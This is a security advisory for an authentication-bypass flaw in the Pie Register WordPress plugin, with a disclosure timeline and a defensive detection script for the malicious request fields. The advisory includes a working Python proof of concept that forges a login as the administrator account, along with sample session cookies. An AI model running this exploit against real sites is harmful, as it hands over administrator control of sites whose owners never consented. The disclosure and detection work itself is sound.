Pie Register 2.0.14-2.0.15, Privilege Escalation
User input is not validated correctly when accepting a login request via the Pie Register plugin. It is possible to manipulate posted variables in order to login using an arbitrary User ID (such as 1, for the default Administrative account).
Homepage
https://wordpress.org/plugins/pie-register/
CVSS Score
6.4
CVSS Vector
(AV:N/AC:L/Au:N/C:P/I:P/A:N)
Attack Scope
remote
Authorization Required
None
Mitigation
Uninstall the plugin – or patch manually
Proof of Concept
The following PoC will output the cookies required to be authenticated as the user with ID 1
import requests

# Site running the vulnerable plugin
target = "http://localhost"

# The supplied credentials are irrelevant: with social_site set, the plugin
# trusts the posted user_id_social_site value (1 = default administrator)
payload = {
    "log": "a",
    "pwd": "a",
    "social_site": "true",
    "user_id_social_site": 1
}

r = requests.post(target, data=payload, allow_redirects=False)
print(requests.utils.dict_from_cookiejar(r.cookies))
Output
~$ python g0blin-00041.py
{'wordpress_logged_in_70490311fe7c84acda8886406a6d884b': 'test%7C1426764966%7CQ9EFemgr3znqQlg8lgZOMNA1bcwfxIJy2zXsdfT02XT%7C441d78476ba286c940cd5f7ed9bad4ac8b929732698f6ce12f2ce298c1b7242e', 'wordpress_70490311fe7c84acda8886406a6d884b': 'test%7C1426764966%7CQ9EFemgr3znqQlg8lgZOMNA1bcwfxIJy2zXsdfT02XT%7C5569b7140838cecf91b77cb70f2c68f4fa5546e1b7cc71ce417856882d3c6436'}
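Added detection example (not part of the advisory or the plugin): the two posted fields the PoC relies on, social_site and user_id_social_site, never come from a legitimate browser login form, so a WAF or reverse proxy that logs request bodies can flag them. The request records below are constructed, and the field names and paths are assumptions for illustration.

```python
from urllib.parse import parse_qs

# Constructed sample of login POST bodies, in the shape a WAF or reverse proxy
# that records request bodies might store them (not real captured traffic).
SAMPLE_REQUESTS = [
    {"src": "203.0.113.10", "path": "/wp-login.php",
     "body": "log=alice&pwd=secret&wp-submit=Log+In"},
    {"src": "198.51.100.7", "path": "/wp-login.php",
     "body": "log=a&pwd=a&social_site=true&user_id_social_site=1"},
    {"src": "198.51.100.7", "path": "/wp-login.php",
     "body": "log=a&pwd=a&social_site=true&user_id_social_site=42"},
    {"src": "192.0.2.5", "path": "/index.php",
     "body": "social_site=true&user_id_social_site=1"},
]

TRUTHY = {"1", "true", "yes", "on"}


def flag_social_login_bypass(req):
    """Return an alert dict if the request carries the client-supplied
    social-login fields described in the advisory, otherwise None."""
    params = parse_qs(req["body"], keep_blank_values=True)
    social = params.get("social_site", [""])[0].strip().lower()
    uid = params.get("user_id_social_site", [None])[0]
    if social not in TRUTHY or uid is None:
        return None
    uid = uid.strip()
    # A client has no legitimate reason to assert which user ID it logs in as;
    # ID 1 is the default administrator account, so rank that highest.
    severity = "high" if uid == "1" else "medium"
    return {"src": req["src"], "path": req["path"],
            "user_id": uid, "severity": severity}


def scan(records):
    """Run the check over a list of request records and return all alerts."""
    return [a for a in (flag_social_login_bypass(r) for r in records) if a]


if __name__ == "__main__":
    for alert in scan(SAMPLE_REQUESTS):
        print(alert)
```

The check is deliberately path-independent because the PoC posts to the site root; restrict it to login endpoints only if your proxy normalises paths reliably.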
Timeline
- 2015-03-16: Discovered
- 2015-03-16: Vendor notified
- 2015-03-17: Vendor responded – already fixed in a pending 2.0.15 release – stated would allow for review prior to release
- 2015-03-24: Vendor responded – stated new version in testing – will be released mid April
- 2015-04-13: Update requested from Vendor
- 2015-04-20: Update requested from Vendor
- 2015-04-20: Vendor states new version
- 2015-04-29: Update requested from Vendor – stated reports to be released on Monday due to lack of communication
- 2015-04-30: Version 2.0.15 released – issue still present – no chance for review given
- 2015-05-04: Advisory released: